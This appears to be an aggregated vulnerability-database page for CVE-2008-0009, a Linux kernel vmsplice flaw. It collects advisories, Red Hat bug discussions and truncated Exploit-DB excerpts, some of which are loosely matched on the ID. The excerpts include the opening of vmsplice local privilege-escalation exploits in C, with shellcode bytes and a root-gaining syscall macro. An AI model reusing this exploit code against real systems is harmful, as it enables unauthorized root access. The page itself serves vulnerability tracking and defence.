CVE-2008-0009
published 2008-02-12
Priority: P4 · 15 · low · 2.1 · CVSS 2.0
Vector: AV:L/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 0.96% (57.0th percentile)
The vmsplice_to_user function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which might allow local users to access arbitrary kernel memory locations.
Affected
69 ranges · showing 25 (all 25 rows shown are identical: vendor and product only, no version range or fixed-in version given)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 2.1 | LOW | AV:L/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | — | 2.1 | LOW | — |
| vendor_redhat | — | 2.1 | LOW | — |
GHSA
GHSA-vv62-ccxv-738x · ghsa_unreviewed · 2022-05-01 · CVSS 2.1
CVE-2008-0600 [LOW] · CWE-94
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
GHSA
GHSA-hw2g-wprj-fvrq · ghsa_unreviewed · 2022-05-01
CVE-2008-0009 [LOW] · CWE-20
The vmsplice_to_user function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which might allow local users to access arbitrary kernel memory locations.
VulnCheck
Linux Kernel Improper Control of Generation of Code ('Code Injection')
vulncheck · 2008 · CVSS 2.1
CVE-2008-0600 [LOW]
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Affected: Linux Kernel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/SSH+new+brute+force+tool/9370/
VMware
VMSA-2008-0009: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues
vendor_vmware · 2008-06-04 · CVSS 2.6
CVE-2006-1721 [LOW]
VMware Security Advisory · Advisory ID: VMSA-2008-0009 · Synopsis: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues
CVEs: CVE-2006-1721, CVE-2007-4772, CVE-2007-5378, CVE-2007-5671, CVE-2008-0062, CVE-2008-0063, CVE-2008-0553, CVE-2008-0888, CVE-2
Red Hat
kernel vmsplice_to_pipe flaw
vendor_redhat · 2008-02-09 · CVSS 2.1
CVE-2008-0600 [LOW] · CWE-119
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Statement: This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4.
Red Hat
kernel: Inappropriate dereference of user-supplied memory pointers
vendor_redhat · 2008-02-07 · CVSS 2.1
CVE-2008-0009 [LOW]
The vmsplice_to_user function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which might allow local users to access arbitrary kernel memory locations.
Statement: Not vulnerable. This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)
exploitdb · 2019-10-29 · CVSS 3.3
CVE-2015-0009 [LOW]
```text
# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,
# Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0009
# Type: Remote
# Platform: Windows
# Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes
# the target system to revert various security settings to their default settings. This includes SMB server
# and network client settings, which by default do not
```
Exploit-DB
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
exploitdb · 2008-02-09
CVE-2008-0600
```c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
    unsigned long flags;
    int count;
    int mapcount;
    unsigned long private;
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
    fflush(stdout);
    fflush(stderr);
    exit(1);
}

#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0
```
Exploit-DB
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
exploitdb · 2008-02-09
CVE-2008-0600
```c
#include
#include
#include
#include
#include

#define TARGET_PATTERN " sys_vm86old"
#define TARGET_SYSCALL 113

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)

#define TRAMP_CODE (void *) trampoline
#define TRAMP_SIZE ( sizeof(trampoline) - 1 )

unsigned char trampoline[] =
    "\x8b\x5c\x24\x04"          /* mov 0x4(%esp),%ebx */
    "\x8b\x4c\x24\x08"          /* mov 0x8(%esp),%ecx */
    "\x81\xfb\x69\x7a\x00\x00"  /* cmp $31337,%ebx */
    "\x75\x02"                  /* jne +2 */
    "\xff\xd1"                  /* call *%ecx */
    "\xb8\xea\xff\xff\xff"      /* mov $-EINVAL,%eax */
    "\xc3"                      /* ret */
    ;

void die(char *msg, int err)
{
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror
```
Bugzilla
CVE-2007-6731 xmp: Multiple buffer overflows in OXM decoder
bugzilla · 2009-09-14 · CVSS 10.0
CVE-2007-6731 [CRITICAL]
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6731 to
the following vulnerability:
Extended Module Player (XMP) 2.5.1 and earlier allow remote attackers
to execute arbitrary code via an OXM file with a negative value, which
bypasses a check in (1) test_oxm and (2) decrunch_oxm functions in
misc/oxm.c, leading to a buffer overflow.
References:
http://aluigi.altervista.org/adv/xmpbof-adv.txt
http://www.securityfocus.com/bid/27047
http://www.vupen.com/english/advisories/2008/0009
PoC:
----
http://aluigi.org/poc/xmpbof.zip (/a.out 1 out.oxm)
Upstream status -- issue addressed in xmp-2.6.0:
http://sourceforge.net/project/shownotes.php?group_id=26422&release_id=692238
Credit:
Luigi Auriemma
Discussion:
T
Bugzilla
CVE-2007-6732 xmp: Buffer overflow in DTT file loader
bugzilla · 2009-09-14 · CVSS 10.0
CVE-2007-6732 [CRITICAL]
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6732 to
the following vulnerability:
Multiple buffer overflows in the dtt_load function in
loaders/dtt_load.c Extended Module Player (XMP) 2.5.1 and earlier
allow remote attackers to execute arbitrary code via unspecified
vectors related to an untrusted length value and the (1) pofs and (2)
plen arrays.
References:
http://aluigi.altervista.org/adv/xmpbof-adv.txt
http://www.securityfocus.com/bid/27047
http://www.vupen.com/english/advisories/2008/0009
PoC:
---
http://aluigi.org/poc/xmpbof.zip (a.out 2 out.dtt)
Upstream status -- issue addressed in xmp-2.6.0:
http://sourceforge.net/project/shownotes.php?group_id=26422&release_id=692238
Credit:
Luigi Auriemma
Disc
Bugzilla
CVE-2008-0600 kernel vmsplice_to_pipe flaw
bugzilla · 2008-02-10 · CVSS 2.1
CVE-2008-0600 [LOW]
A new system call named vmsplice() was introduced in the 2.6.17
release of the Linux kernel.
COSEINC reported two issues affecting vmsplice, CVE-2008-0009 and CVE-2008-0010.
On Saturday 20080210 a public exploit was released that utilised a similar flaw
in vmsplice (vmsplice_to_pipe function) to allow a local user to gain privileges
on some architectures.
See also
http://marc.info/?t=120263655300003&r=1&w=2
This issue will affect kernels 2.6.17+ and therefore affected Red Hat Enterprise
Linux 5, but not Red Hat Enterprise Linux 4, 3, or 2.1.
Discussion:
Note that there may be a little confusion as there are actually three vmsplice
issues:
CVE-2008-0009 is already fixed upstream, does not affect any RHEL, has no
public exploit. Upstream pat
Bugzilla
CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
bugzilla · 2008-02-01 · CVSS 2.1
CVE-2008-0009 [LOW]
Description of problem:
A new system call named vmsplice() was introduced in the 2.6.17
release of the Linux kernel.
Inappropriate dereference of user-supplied memory pointers in the
code beginning at line 1378 in the vmsplice_to_user() kernel
function (fs/splice.c):
The patch for this issue not provided by the reporter.
Discussion:
see bug #432251
---
There was a bit of confusion as the code changed since introduction 2.6.17, so
Red Hat Enterprise Linux kernels had code different to upstream.
CVE-2008-0009 and CVE-2008-0010 only affected kernels 2.6.22+ so Red Hat
Enterprise Linux was not affected
CVE-2008-0600 affected kernels 2.6.17+ so affects Red Hat Enterprise Linux 5.
Closing this CVE-2008-000
References
http://isec.pl/vulnerabilities/isec-0026-vmsplice_to_kernel.txt
http://secunia.com/advisories/28835
http://secunia.com/advisories/28896
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1
http://www.securityfocus.com/archive/1/487982/100/0/threaded
http://www.securityfocus.com/bid/27704
http://www.securityfocus.com/bid/27799
http://www.vupen.com/english/advisories/2008/0487/references
https://bugzilla.redhat.com/show_bug.cgi?id=431206
https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00254.html
https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00255.html